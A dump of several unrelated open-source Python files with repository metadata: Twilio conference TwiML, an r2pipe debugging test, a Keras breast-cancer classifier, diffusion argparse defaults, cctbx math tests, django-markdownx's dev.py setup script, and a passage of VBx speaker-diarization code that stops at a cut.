from twilio.twiml.voice_response import Conference, Dial, VoiceResponse
response = VoiceResponse()
dial = Dial()
dial.conference(
'NoMusicNoBeepRoom',
beep=False,
wait_url='http://your-webhook-host.com',
start_conference_on_enter=True,
end_conference_on_exit=True
)
response.append(dial)
print(response)
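# Expected output (editor's note, roughly; attribute order may differ):
# <?xml version="1.0" encoding="UTF-8"?>
# <Response>
#   <Dial>
#     <Conference beep="false" waitUrl="http://your-webhook-host.com"
#                 startConferenceOnEnter="true" endConferenceOnExit="true">
#       NoMusicNoBeepRoom
#     </Conference>
#   </Dial>
# </Response>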
|
e10d7d360d97a5a1e7f208be0d0bae4207c26805
|
9ea5689a6cbe7782b433f3e8da1f6533a757159f
|
/python/dbgtest.py
|
35f05deadad5ccefd00bbbe1e36e4a9d256dd92a
|
[
"MIT"
] |
permissive
|
radareorg/radare2-r2pipe
|
0b538429ed9155ccbf10bfc719036284d5bcb86f
|
3a1dba2db43832913f815f3af807f03125d82724
|
refs/heads/master
| 2023-08-31T00:14:51.679842
| 2023-08-27T15:59:30
| 2023-08-27T15:59:30
| 70,247,098
| 239
| 53
| null | 2022-11-25T10:23:57
| 2016-10-07T13:04:06
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 195
|
py
|
dbgtest.py
|
#!/usr/bin/env python3
import r2pipe
r2 = r2pipe.open("/bin/ls", ["-nd"])
for a in range(1, 10):
regs = r2.cmdj("drj")
print("0x%x 0x%x" % (regs["rip"], regs["rsp"]))
r2.cmd("ds")
|
28fcb45f6d78a19ccf57f466bff4649002aa3e7e
|
85b402cd9e762b2749c978105ea362b10d335e5c
|
/175-breast_cancer_without_PCA.py
|
399fddd2a7b76d52c29f8ed8b5a36e194fa3b658
|
[] |
no_license
|
bnsreenu/python_for_microscopists
|
29c08f17461baca95b5161fd4cd905be515605c4
|
4b8c0bd4274bc4d5e906a4952988c7f3e8db74c5
|
refs/heads/master
| 2023-09-04T21:11:25.524753
| 2023-08-24T18:40:53
| 2023-08-24T18:40:53
| 191,218,511
| 3,010
| 2,206
| null | 2023-07-25T07:15:22
| 2019-06-10T17:53:14
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,552
|
py
|
175-breast_cancer_without_PCA.py
|
# https://youtu.be/e2sM7ccaA9c
"""
Using....
https://archive.ics.uci.edu/ml/datasets/Breast+Cancer+Wisconsin+(Diagnostic)
"""
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout
df = pd.read_csv("data/wisconsin_breast_cancer_dataset.csv")
print(df.describe().T) #Values need to be normalized before fitting.
print(df.isnull().sum())
#df = df.dropna()
#Rename Diagnosis to Label to make it easy to understand
df = df.rename(columns={'Diagnosis':'Label'})
print(df.dtypes)
#Understand the data
#sns.countplot(x="Label", data=df) #M - malignant B - benign
####### Replace categorical values with numbers########
df['Label'].value_counts()
#Define the dependent variable that needs to be predicted (labels)
y = df["Label"].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder
labelencoder = LabelEncoder()
Y = labelencoder.fit_transform(y) # M=1 and B=0
#################################################################
#Define x and normalize values
#Define the independent variables. Drop the Label and ID columns so only the numeric features are normalized
X = df.drop(labels = ["Label", "ID"], axis=1)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
#Split data into train and test to verify accuracy after fitting the model.
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=42)
####################################################################
#Simple network 1
# Appropriate architecture for the challenge
model = Sequential()
model.add(Dense(16, input_dim=30, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam', #also try rmsprop
metrics=['accuracy'])
#model.compile(loss='mean_squared_error', optimizer='adam')
print(model.summary())
###########################################################
import datetime
start = datetime.datetime.now()
# # fit the model
history = model.fit(X_train, y_train ,verbose=1, epochs=100, batch_size=64,
validation_data=(X_test, y_test))
end = datetime.datetime.now()
print("Total execution time is: ", end-start)
_, acc = model.evaluate(X_test, y_test)
print("Accuracy = ", (acc * 100.0), "%")
#plot the training and validation accuracy and loss at each epoch
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, 'y', label='Training loss')
plt.plot(epochs, val_loss, 'r', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
plt.plot(epochs, acc, 'y', label='Training acc')
plt.plot(epochs, val_acc, 'r', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Accuracy')
plt.legend()
plt.show()
# Predicting the Test set results
y_pred = model.predict(X_test)
y_pred = (y_pred > 0.5)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
sns.heatmap(cm, annot=True)
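# --- Editor's addition: per-class metrics from the same predictions (optional) -
# Precision, recall and F1 per class complement the overall accuracy above
# (LabelEncoder mapped B=0 and M=1).
from sklearn.metrics import classification_report
print(classification_report(y_test, y_pred, target_names=['Benign (B)', 'Malignant (M)']))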
|
3f0d14dc4106c43282724ed930f972ead629d0d8
|
24f10a85b5eaffd7619b6095ce1ae66dbfabe85e
|
/src/utils/args_utils.py
|
1e9b060c694fc674d782f375654a946aac002f44
|
[
"MIT"
] |
permissive
|
madaan/minimal-text-diffusion
|
7f2aa8ce21effa25e1f86f917c32d49576a2f1ec
|
9303ffd481a2f647da24c6053e4dec44fd086a8d
|
refs/heads/main
| 2023-05-25T17:07:21.803835
| 2023-05-11T12:19:55
| 2023-05-11T12:19:55
| 539,045,602
| 199
| 17
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,524
|
py
|
args_utils.py
|
"""
Utilities for command line arguments.
"""
import argparse
def create_argparser():
defaults = dict(
data_dir="",
schedule_sampler="uniform",
lr=1e-4,
weight_decay=0.0,
lr_anneal_steps=30000,
batch_size=1,
microbatch=-1, # -1 disables microbatches
ema_rate="0.9999", # comma-separated list of EMA values
log_interval=50,
save_interval=25000,
resume_checkpoint="",
use_fp16=False,
fp16_scale_growth=1e-3,
seed=101,
gradient_clipping=-1.0,
eval_interval=2000,
checkpoint_path="diff_models",
train_txt_path="data/quotes_train.txt",
val_txt_path="data/quotes_valid.txt",
dataset="",
notes="",
)
text_defaults = dict(
modality="text",
emb_scale_factor=1.0,
in_channel=16,
out_channel=16,
noise_level=0.0,
cache_mode="no",
use_bert_tokenizer="no",
padding_mode="block",
preprocessing_num_workers=1,
tok_thresh=150
)
guided_generation_defaults = dict(
classifier_num_epochs=15
)
defaults.update(model_and_diffusion_defaults())
defaults.update(text_defaults)
defaults.update(guided_generation_defaults)
defaults.update(decoding_defaults())
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
add_dict_to_argparser(parser, defaults)
return parser
def model_and_diffusion_defaults():
"""
Defaults for text-diffusion model training.
"""
return dict(
sequence_len=64,
num_channels=16,
num_heads=4,
dropout=0.0,
learn_sigma=False,
sigma_small=False,
class_cond=False,
diffusion_steps=10000,
noise_schedule="linear",
timestep_respacing="",
use_kl=False,
predict_xstart=False,
rescale_timesteps=True,
rescale_learned_sigmas=True,
use_checkpoint=False,
model_arch="transformer",
in_channel=16,
out_channel=16,
vocab_size=66,
config_name="bert-base-uncased",
logits_mode=1,
training_mode="diffusion-lm",
init_pretrained=False,
freeze_embeddings=False,
use_pretrained_embeddings=True,
)
def decoding_defaults():
return dict(
num_samples=50,
top_p=0.9,
out_dir="",
model_name_or_path="",
checkpoint_path="",
use_ddim=False,
clip_denoised=False,
batch_size=64,
mbr_sample=1,
verbose="yes",
clamp="clamp",
preprocessing_num_workers=1,
emb_scale_factor=1.0,
classifier_path="",
)
def add_dict_to_argparser(parser, default_dict):
for k, v in default_dict.items():
v_type = type(v)
if v is None:
v_type = str
elif isinstance(v, bool):
v_type = str2bool
parser.add_argument(f"--{k}", default=v, type=v_type)
def args_to_dict(args, keys):
return {k: getattr(args, k) for k in keys}
def str2bool(v):
"""
https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse
"""
if isinstance(v, bool):
return v
if v.lower() in ("yes", "true", "t", "y", "1"):
return True
elif v.lower() in ("no", "false", "f", "n", "0"):
return False
else:
raise argparse.ArgumentTypeError("boolean value expected")
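# --- Editor's sketch: typical usage of the helpers above ----------------------
# Every key in the default dicts becomes a CLI flag; any value can be overridden
# on the command line, e.g. `python args_utils.py --lr 2e-4 --batch_size 8`.
if __name__ == "__main__":
    args = create_argparser().parse_args()
    print(args_to_dict(args, model_and_diffusion_defaults().keys()))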
|
ceaf8e6539c1a96cad5bff56e27a6c9c4d53c78a
|
5b6ba0f288b1e2ac236af846a9bf546a63228476
|
/libtbx/tst_math_utils.py
|
92824c8642b81f477d46450799f1cec626f27471
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
cctbx/cctbx_project
|
5b547b416cadbdf95cca21dace9f54272a08d98a
|
7f4dfb6c873fd560920f697cbfd8a5ff6eed82fa
|
refs/heads/master
| 2023-08-17T17:44:05.077010
| 2023-08-16T22:40:22
| 2023-08-16T22:40:22
| 39,508,026
| 206
| 131
|
NOASSERTION
| 2023-09-14T17:12:55
| 2015-07-22T13:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 5,324
|
py
|
tst_math_utils.py
|
from __future__ import absolute_import, division, print_function
from libtbx.test_utils import approx_equal
from six.moves import range
def exercise_integer():
from libtbx.math_utils import iround, iceil, ifloor, nearest_integer
assert iround(0) == 0
assert iround(1.4) == 1
assert iround(-1.4) == -1
assert iround(1.6) == 2
assert iround(-1.6) == -2
assert iceil(0) == 0
assert iceil(1.1) == 2
assert iceil(-1.1) == -1
assert iceil(1.9) == 2
assert iceil(-1.9) == -1
assert ifloor(0) == 0
assert ifloor(1.1) == 1
assert ifloor(-1.1) == -2
assert ifloor(1.9) == 1
assert ifloor(-1.9) == -2
for i in range(-3,3+1):
assert nearest_integer(i+0.3) == i
assert nearest_integer(i+0.7) == i+1
def exercise_logical():
from libtbx.math_utils import does_imply, are_equivalent
#
assert does_imply(True, True)
assert not does_imply(True, False)
assert does_imply(False, True)
assert does_imply(False, False)
#
assert are_equivalent(True, True)
assert not are_equivalent(True, False)
assert not are_equivalent(False, True)
assert are_equivalent(False, False)
def exercise_nested_loop():
from libtbx.math_utils import nested_loop as nl
assert [list(i) for i in nl([])] == []
assert [list(i) for i in nl([1])] == [[0]]
assert [list(i) for i in nl([1], open_range=False)] == [[0], [1]]
assert [list(i) for i in nl([3])] == [[0], [1], [2]]
assert [list(i) for i in nl(begin=[-2], end=[3])] == [
[-2], [-1], [0], [1], [2]]
assert [list(i) for i in nl(begin=[-1], end=[1], open_range=False)] == [
[-1], [0], [1]]
assert [list(i) for i in nl(begin=[-2,4], end=[3,6])] == [
[-2, 4], [-2, 5], [-1, 4], [-1, 5], [0, 4], [0, 5], [1, 4], [1, 5],
[2, 4], [2, 5]]
assert [list(i) for i in nl(begin=[-2,4], end=[3,6], open_range=False)] == [
[-2, 4], [-2, 5], [-2, 6], [-1, 4], [-1, 5], [-1, 6], [0, 4], [0, 5],
[0, 6], [1, 4], [1, 5], [1, 6], [2, 4], [2, 5], [2, 6], [3, 4], [3, 5],
[3, 6]]
assert [list(i) for i in nl(begin=[-1,0,-1], end=[1,2,1])] == [
[-1, 0, -1], [-1, 0, 0], [-1, 1, -1], [-1, 1, 0], [0, 0, -1], [0, 0, 0],
[0, 1, -1], [0, 1, 0]]
def exercise_next_permutation():
from libtbx.math_utils import next_permutation
seq = []
assert next_permutation(seq) is False
seq = [0]
assert next_permutation(seq) is False
seq = [0,1]
assert next_permutation(seq)
assert seq == [1, 0]
assert not next_permutation(seq)
assert seq == [0, 1]
seq = [0,1,2]
result = []
while True:
result.append(tuple(seq))
if (not next_permutation(seq)):
break
assert result == [
(0, 1, 2),
(0, 2, 1),
(1, 0, 2),
(1, 2, 0),
(2, 0, 1),
(2, 1, 0)]
assert seq == [0,1,2]
expected_n = 1
for m in range(1,7):
expected_n *= m
seq = list(range(m))
n = 0
while True:
n += 1
if (not next_permutation(seq)):
break
assert seq == list(range(m))
assert n == expected_n
def exercise_random_permutation_in_place():
from libtbx.math_utils import random_permutation_in_place
import random
random.seed(0)
l = list(range(8))
for i_trial in range(10):
random_permutation_in_place(list=l)
if (l != list(range(8))):
break
else:
raise AssertionError
assert sorted(l) == list(range(8))
def exercise_prime_factors_of():
from libtbx.math_utils import prime_factors_of
assert prime_factors_of(n=1) == []
prime_set = set()
for n in range(2, 100):
primes = prime_factors_of(n)
pp = 1
for p in primes:
pp *= p
assert pp == n
prime_set.update(primes)
if (n == 30):
assert prime_set == set([2,3,5,7,11,13,17,19,23,29])
for n in prime_set:
assert prime_factors_of(n) == [n]
assert len(prime_set) == 25
def exercise_normalize_angle():
from libtbx.math_utils import normalize_angle as n
import math
for deg,period in [(False, 2*math.pi), (True, 360.)]:
assert approx_equal(n(0, deg=deg), 0, eps=1.e-12)
assert approx_equal(n(1.e-8, deg=deg), 1.e-8, eps=1.e-12)
assert approx_equal(n(-1.e-8, deg=deg), period-1.e-8, eps=1.e-12)
assert approx_equal(n(1, deg=deg), 1, eps=1.e-12)
assert approx_equal(n(-1, deg=deg), period-1, eps=1.e-12)
assert approx_equal(n(1.e+8), 1.9426951384)
assert approx_equal(n(-1.e+8), 4.34049016878)
assert approx_equal(n(1.e+8, deg=True), 280)
assert approx_equal(n(-1.e+8, deg=True), 80)
def exercise_percentile_based_spread():
from libtbx.math_utils import percentile_based_spread
import random
import math
n_points = 123456
deltas = []
for i in range(n_points):
x = random.gauss(100, 10)
deltas.append(x)
for i in range(1000):
x = random.gauss(300, 30)
deltas.append(x)
pbs = percentile_based_spread(deltas)
pbs_1 = percentile_based_spread(deltas, sort = False)
assert abs(pbs - pbs_1) < 0.01
rmsd = math.sqrt(sum([ x**2 for x in deltas]) / n_points)
assert (pbs > 100) and (pbs < rmsd)
# Test small list processing
assert percentile_based_spread([1,1]) > 0
def exercise():
exercise_integer()
exercise_logical()
exercise_nested_loop()
exercise_next_permutation()
exercise_random_permutation_in_place()
exercise_prime_factors_of()
exercise_normalize_angle()
exercise_percentile_based_spread()
print("OK")
if (__name__ == "__main__"):
exercise()
|
4451b4484319a5e8de4800677e5e1e395261aebe
|
fbea75f1590a1743da593c067d563324588f0725
|
/dev.py
|
2ea3080fb0a6d53700b52c3313ba12616d0c29c2
|
[
"BSD-2-Clause-Views"
] |
permissive
|
neutronX/django-markdownx
|
5b30f4e4920444fbcc9c45db5ed06304f9e21371
|
f02caa69cbdfe11e14182d9a5c003de92eb91822
|
refs/heads/master
| 2023-08-13T17:54:22.973593
| 2023-03-31T10:40:55
| 2023-03-31T10:40:55
| 26,052,435
| 713
| 166
|
NOASSERTION
| 2023-09-10T23:56:31
| 2014-11-01T14:15:37
|
Python
|
UTF-8
|
Python
| false
| false
| 11,427
|
py
|
dev.py
|
# -*- coding: utf-8 -*-
"""
usage: dev.py [-h] (-v | -d | -c | -run-vagrant | -run-docker | -no-container)
[--with-docs] [--with-npm-settings]
optional arguments:
-h, --help show this help message and exit
-v, --vagrant Install Vagrant development environment (requires
Vagrant).
-d, --docker Install Docker development environment (requires
Docker).
-c, --clean Clean up the development files (only the ones that have
been automatically created).
-run-vagrant Run vagrant development environment (runs --vagrant if
the files don't already exist). Vagrant must be
installed on your machine.
-run-docker Run docker development environment (runs --docker if
the files don't already exist). Docker must already be
installed on your machine, and Docker Daemon must be up
and running.
-no-container Create development files without a container-based
development environment (creates "manage.py" and "runtests.py").
--with-docs Install documentation development environment.
--with-npm-settings Install npm installation environment for front-end
(TypeScript) development (requires node.js and npm).
Copyright (c) 2017, Django MarkdownX - Adi, Pouria Hadjibagheri.
"""
# Python's internal libraries:
from __future__ import unicode_literals
from os.path import join as join_path, dirname, abspath, exists, splitext
from os import remove, chmod, stat
from stat import S_IEXEC
from sys import executable as python_path
from sys import exit as sys_exit
# Third party libraries:
try:
from pip._internal import main as pip_main
except ImportError: # pip < 10
from pip import main as pip_main
BASE_DIR = dirname(abspath(__file__))
DEV_XML_FILE = 'dev.xml'
XML_FILE_ABSOLUTE_PATH = join_path(BASE_DIR, DEV_XML_FILE)
pypi_packages = {
'mkdocs',
'pymdown-extensions',
}
bash_commands = {
'vagrant': (
'cd {path}'.format(path=BASE_DIR),
'vagrant up',
'vagrant ssh -c "/home/vagrant/.virtualenvs/django-markdownx/bin/python -u '
'/srv/django-markdownx/manage.py runserver 0.0.0.0:8000"'
),
'docs': (
'mkdocs build',
),
'docker': (
'docker-compose build',
'docker-compose up -d'
)
}
def quiz(question, options, max_attempts=3):
from collections import Counter
count = Counter([item[0] for item in options])
if max(count.values()) > 1:
raise ValueError(
'Multiple options start with '
'character "{}".'.format(max(count, lambda x: count[x]))
)
current_attempt = 0
opts = tuple(key[0] for key in options)
opts_str = str.join(
', ',
('[{}]{}'.format(key, options[index][1:]) for index, key in enumerate(opts))
)
while current_attempt < max_attempts:
try:
response = input(
'> {question}\n'
' {opts} (ctrl+c to cancel): '.format(question=question, opts=opts_str)
)
if response.strip() in opts:
return options[opts.index(response.strip())]
print('\nInvalid response.')
current_attempt += 1
except KeyboardInterrupt:
print('\nOperation cancelled by the user. Exited with code 0.')
sys_exit(0)
else:
print(
'\nFailed {} attempts. Operation cancelled, '
'exited with code 1.'.format(max_attempts)
)
sys_exit(1)
def yes_no_quiz(question, max_attempts=3):
response = quiz(
question=question,
options=('Yes', 'No'),
max_attempts=max_attempts
)
return response == 'Yes'
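# Example (editor's note): quiz('Continue?', options=('Yes', 'No', 'Abort'))
# prompts with "[Y]es, [N]o, [A]bort", expects the first letter of an option
# ("Y", "N" or "A") and returns the full option string that was chosen.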
def replace_contents_or_not(path):
replace_response = 'override and update the default'
replace_or_override = dict(
question='Contents of the existing "{}" and default values don\'t match. '
'Would you like to...\n'.format(path),
options=(
'override and update the default',
'replace changes with the default'
)
)
return quiz(**replace_or_override) == replace_response
def from_terminal(subject):
from subprocess import run as run_bash
from shlex import split as shlex_split
for command in bash_commands[subject]:
print('> EXECUTING:', command)
run_bash(shlex_split(command), timeout=None, check=True)
return True
def create_files(name):
from xml.etree.ElementTree import parse
from xml.sax.saxutils import escape, unescape
contents_xml = parse(XML_FILE_ABSOLUTE_PATH)
root = contents_xml.getroot()
for file in root:
if name in file.attrib['for'].split(';'):
relative_path = [node.text for node in file.iterfind('path')]
absolute_path = join_path(BASE_DIR, *relative_path)
display_path = join_path('markdownx', *relative_path)
template_contents = file.find('contents').text
if exists(absolute_path):
with open(absolute_path, mode='r') as data_file:
file_io = data_file.read()
contents_identical = template_contents.strip() == escape(file_io.strip())
if not contents_identical and replace_contents_or_not(display_path):
file.find('contents').text = escape(file_io)
elif not contents_identical:
with open(absolute_path, mode='w') as file_io:
file_io.write(unescape(template_contents) + '\n')
print('> REPLACED with default:', display_path)
else:
with open(absolute_path, mode='w') as target_file:
target_file.write(unescape(template_contents))
print('> CREATED:', display_path)
if splitext(absolute_path)[1] == '.sh' or absolute_path.endswith('manage.py'):
st = stat(absolute_path)
chmod(absolute_path, st.st_mode | S_IEXEC)
contents_xml.write(
file_or_filename=XML_FILE_ABSOLUTE_PATH,
xml_declaration=True,
encoding='UTF-8',
method='xml'
)
return True
def delete(abs_path, disp_path):
try:
remove(abs_path)
except IOError as error:
print('Failed to delete "{}"\n'.format(disp_path), error)
print('> REMOVED:', disp_path)
return True
def clean():
response = yes_no_quiz(
question="Are you sure you want to clean up "
"the developers' environment?"
)
if not response:
print('Exited at user\'s request with code 0.')
sys_exit(0)
from xml.etree.ElementTree import parse
from xml.sax.saxutils import escape
contents_xml = parse(XML_FILE_ABSOLUTE_PATH)
root = contents_xml.getroot()
for file in root:
relative_path = [node.text for node in file.iterfind('path')]
absolute_path = join_path(BASE_DIR, *relative_path)
display_path = join_path('markdownx', *relative_path)
if not exists(absolute_path):
continue
with open(absolute_path, mode='r') as data_file:
file_content = data_file.read()
if file.find('contents').text.strip() == escape(file_content.strip()):
delete(absolute_path, display_path)
continue
if replace_contents_or_not(display_path):
file.find('contents').text = escape(file_content)
print('> UPDATED in default setting:', display_path)
delete(absolute_path, display_path)
continue
delete(absolute_path, display_path)
delete(join_path(BASE_DIR, 'db.sqlite3'), 'db.sqlite3')
contents_xml.write(
file_or_filename=XML_FILE_ABSOLUTE_PATH,
xml_declaration=True,
encoding='UTF-8',
method='xml'
)
return True
def docs():
subject = 'docs'
create_files(subject)
pip_install(*pypi_packages)
return from_terminal(subject)
def vagrant():
subject = 'vagrant'
return create_files(subject)
def run_vagrant():
subject = 'vagrant'
vagrant()
return from_terminal(subject)
def docker():
subject = 'docker'
return create_files(subject)
def run_docker():
subject = 'docker'
docker()
return from_terminal(subject)
def npm():
subject = 'npm'
return create_files(subject)
def no_container():
subject = 'no-container'
return create_files(subject)
def pip_install(*packages):
for package in packages:
pip_main(['install', package])
return True
def main():
import argparse
from datetime import datetime
parser = argparse.ArgumentParser(
description='Welcome to Django MarkdownX Developers\' Environment.',
epilog=(
"Copyright (c) {}, Django MarkdownX - "
"Adi, Pouria Hadjibagheri.".format(
datetime.now().strftime('%Y')
)
)
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'-v',
'--vagrant',
action='store_const',
const=vagrant,
dest='run',
help='Install Vagrant development environment (requires Vagrant).'
)
group.add_argument(
'-d',
'--docker',
action='store_const',
dest='run',
const=docker,
help='Install Docker development environment (requires Docker).'
)
group.add_argument(
'-c',
'--clean',
action='store_const',
const=clean,
dest='run',
help='Clean up the development files (only the ones that '
'have been automatically created).'
)
group.add_argument(
'-run-vagrant',
action='store_const',
dest='run',
const=run_vagrant,
help='Run vagrant development environment '
'(runs --vagrant if the files don\'t already exist). '
'Vagrant must be installed on your machine.'
)
group.add_argument(
'-run-docker',
action='store_const',
dest='run',
const=run_docker,
help='Run docker development environment '
'(runs --docker if the files don\'t already exist). '
'Docker must already be installed on your machine, and '
'Docker Daemon must be up and running.'
)
group.add_argument(
'-no-container',
action='store_const',
dest='run',
const=no_container,
help='Create development files without a container-based '
'development environment (creates "manage.py" and "runtests.py").'
)
parser.add_argument(
'--with-docs',
action='store_const',
const=docs,
dest='run',
help='Install documentation development environment.'
)
parser.add_argument(
'--with-npm-settings',
action='store_const',
const=npm,
dest='run',
help='Install npm installation environment for front-end '
'(TypeScript) development (requires node.js and npm).'
)
parser.parse_args().run()
return parser
if __name__ == '__main__':
main()
|
099c2530fd8ad7e8b9385663e114a15178ea8075
|
de8cecd17d1d8a06532fb59d160faa18de855f12
|
/VBx/vbhmm.py
|
380ce3e049c0d4992a3ca6ce360ccf6ab93f3d1b
|
[
"Apache-2.0"
] |
permissive
|
BUTSpeechFIT/VBx
|
df8bc3bf537e8206e7904830421c994d50e39255
|
7dfa3fab81c36b144cde9647fc80d96c0261a772
|
refs/heads/master
| 2023-03-06T17:40:30.329947
| 2023-02-23T08:07:16
| 2023-02-23T08:07:16
| 239,834,186
| 213
| 63
| null | 2023-02-23T08:07:17
| 2020-02-11T18:27:11
|
Python
|
UTF-8
|
Python
| false
| false
| 8,796
|
py
|
vbhmm.py
|
#!/usr/bin/env python
# @Authors: Lukas Burget, Mireia Diez, Federico Landini, Jan Profant
# @Emails: burget@fit.vutbr.cz, mireia@fit.vutbr.cz, landini@fit.vutbr.cz, jan.profant@phonexia.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The recipe consists of doing Agglomerative Hierarchical Clustering on
# x-vectors in a first step. Then, Variational Bayes HMM over x-vectors
# is applied using the AHC output as the initialization.
#
# A detailed analysis of this approach is presented in
# F. Landini, J. Profant, M. Diez, L. Burget
# Bayesian HMM clustering of x-vector sequences (VBx) in speaker diarization:
# theory, implementation and analysis on standard tasks
# Computer Speech & Language, 2022
import argparse
import os
import itertools
import fastcluster
import h5py
import kaldi_io
import numpy as np
from scipy.cluster.hierarchy import fcluster
from scipy.spatial.distance import squareform
from scipy.special import softmax
from scipy.linalg import eigh
from diarization_lib import read_xvector_timing_dict, l2_norm, \
cos_similarity, twoGMMcalib_lin, merge_adjacent_labels, mkdir_p
from kaldi_utils import read_plda
from VBx import VBx
def write_output(fp, out_labels, starts, ends):
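    # Note (editor): relies on `file_name` from the enclosing script scope,
    # which is set in the per-recording loop below.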
for label, seg_start, seg_end in zip(out_labels, starts, ends):
fp.write(f'SPEAKER {file_name} 1 {seg_start:03f} {seg_end - seg_start:03f} '
f'<NA> <NA> {label + 1} <NA> <NA>{os.linesep}')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--init', required=True, type=str,
choices=['AHC', 'AHC+VB'],
help='AHC to use only AHC, or AHC+VB to run VB-HMM '
'after AHC initialization', )
parser.add_argument('--out-rttm-dir', required=True, type=str,
help='Directory to store output rttm files')
parser.add_argument('--xvec-ark-file', required=True, type=str,
help='Kaldi ark file with x-vectors from one or more '
'input recordings. Attention: all x-vectors from '
'one recording must be in one ark file')
parser.add_argument('--segments-file', required=True, type=str,
help='File with x-vector timing info. See '
'diarization_lib.read_xvector_timing_dict')
parser.add_argument('--xvec-transform', required=True, type=str,
help='path to x-vector transformation h5 file')
parser.add_argument('--plda-file', required=True, type=str,
help='File with PLDA model in Kaldi format used for '
'AHC and VB-HMM x-vector clustering')
parser.add_argument('--threshold', required=True, type=float,
help='Threshold (bias) used for AHC')
parser.add_argument('--lda-dim', required=True, type=int,
help='For VB-HMM, x-vectors are reduced to this '
'dimensionality using LDA')
parser.add_argument('--Fa', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--Fb', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--loopP', required=True, type=float,
help='Parameter of VB-HMM (see VBx.VBx)')
parser.add_argument('--target-energy', required=False, type=float,
default=1.0,
help='Parameter affecting AHC if the similarity '
'matrix is obtained with PLDA. See '
'diarization_lib.kaldi_ivector_plda_scoring_dense')
parser.add_argument('--init-smoothing', required=False, type=float,
default=5.0,
help='AHC produces hard assignments of x-vectors to '
'speakers. These are "smoothed" to soft '
'assignments as the initialization for '
'VB-HMM. This parameter controls the amount of '
'smoothing. Not so important, a high value '
'(e.g. 10) is OK => keeping the hard assignment')
parser.add_argument('--output-2nd', required=False, type=bool, default=False,
help='Output also second most likely speaker of VB-HMM')
args = parser.parse_args()
assert 0 <= args.loopP <= 1, f'Expecting loopP between 0 and 1, got {args.loopP} instead.'
# segments file with x-vector timing information
segs_dict = read_xvector_timing_dict(args.segments_file)
kaldi_plda = read_plda(args.plda_file)
plda_mu, plda_tr, plda_psi = kaldi_plda
W = np.linalg.inv(plda_tr.T.dot(plda_tr))
B = np.linalg.inv((plda_tr.T / plda_psi).dot(plda_tr))
acvar, wccn = eigh(B, W)
plda_psi = acvar[::-1]
plda_tr = wccn.T[::-1]
# Open ark file with x-vectors and in each iteration of the following
# for-loop read a batch of x-vectors corresponding to one recording
arkit = kaldi_io.read_vec_flt_ark(args.xvec_ark_file)
# group xvectors in ark by recording name
recit = itertools.groupby(arkit, lambda e: e[0].rsplit('_', 1)[0])
for file_name, segs in recit:
print(file_name)
seg_names, xvecs = zip(*segs)
x = np.array(xvecs)
with h5py.File(args.xvec_transform, 'r') as f:
mean1 = np.array(f['mean1'])
mean2 = np.array(f['mean2'])
lda = np.array(f['lda'])
x = l2_norm(lda.T.dot((l2_norm(x - mean1)).transpose()).transpose() - mean2)
if args.init == 'AHC' or args.init.endswith('VB'):
if args.init.startswith('AHC'):
# Kaldi-like AHC of x-vectors (scr_mx is matrix of pairwise
# similarities between all x-vectors)
scr_mx = cos_similarity(x)
# Figure out an utterance-specific threshold for AHC
thr, _ = twoGMMcalib_lin(scr_mx.ravel())
# output "labels" is an integer vector of speaker (cluster) ids
scr_mx = squareform(-scr_mx, checks=False)
lin_mat = fastcluster.linkage(
scr_mx, method='average', preserve_input=False)
del scr_mx
adjust = abs(lin_mat[:, 2].min())
lin_mat[:, 2] += adjust
labels1st = fcluster(lin_mat, -(thr + args.threshold) + adjust,
criterion='distance') - 1
if args.init.endswith('VB'):
# Smooth the hard labels obtained from AHC to soft assignments
# of x-vectors to speakers
qinit = np.zeros((len(labels1st), np.max(labels1st) + 1))
qinit[range(len(labels1st)), labels1st] = 1.0
qinit = softmax(qinit * args.init_smoothing, axis=1)
fea = (x - plda_mu).dot(plda_tr.T)[:, :args.lda_dim]
q, sp, L = VBx(
fea, plda_psi[:args.lda_dim],
pi=qinit.shape[1], gamma=qinit,
maxIters=40, epsilon=1e-6,
loopProb=args.loopP, Fa=args.Fa, Fb=args.Fb)
labels1st = np.argsort(-q, axis=1)[:, 0]
if q.shape[1] > 1:
labels2nd = np.argsort(-q, axis=1)[:, 1]
else:
raise ValueError('Wrong option for initialization.')
assert(np.all(segs_dict[file_name][0] == np.array(seg_names)))
start, end = segs_dict[file_name][1].T
starts, ends, out_labels = merge_adjacent_labels(start, end, labels1st)
mkdir_p(args.out_rttm_dir)
with open(os.path.join(args.out_rttm_dir, f'{file_name}.rttm'), 'w') as fp:
write_output(fp, out_labels, starts, ends)
if args.output_2nd and args.init.endswith('VB') and q.shape[1] > 1:
